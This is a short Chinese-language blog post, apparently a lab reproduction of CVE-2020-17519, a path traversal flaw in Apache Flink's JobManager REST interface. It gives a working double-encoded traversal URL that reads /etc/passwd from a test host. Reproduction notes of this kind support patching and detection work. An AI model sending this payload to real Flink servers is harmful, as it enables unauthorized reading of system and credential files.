Apache Flink `jobmanager/logs` 路径遍历 (CVE-2020-17519)

发表于 | 分类于 |

Apache Flink jobmanager/logs 路径遍历 (CVE-2020-17519)

Apache Flink 是一个开源的流处理框架,具有强大的流处理和批处理能力。

Apache Flink 1.11.0 中引入的更改(以及在 1.11.1 和 1.11.2 中发布)允许攻击者通过 JobManager 进程的 REST 接口读取 JobManager 本地文件系统上的任何文件。

参考:

漏洞复现

Apache Flink 启动后,访问http://192.168.44.132:8081查看主页。

查看/etc/passwd文件内容,访问

1
http://192.168.44.132:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

image-20210802143248275

0%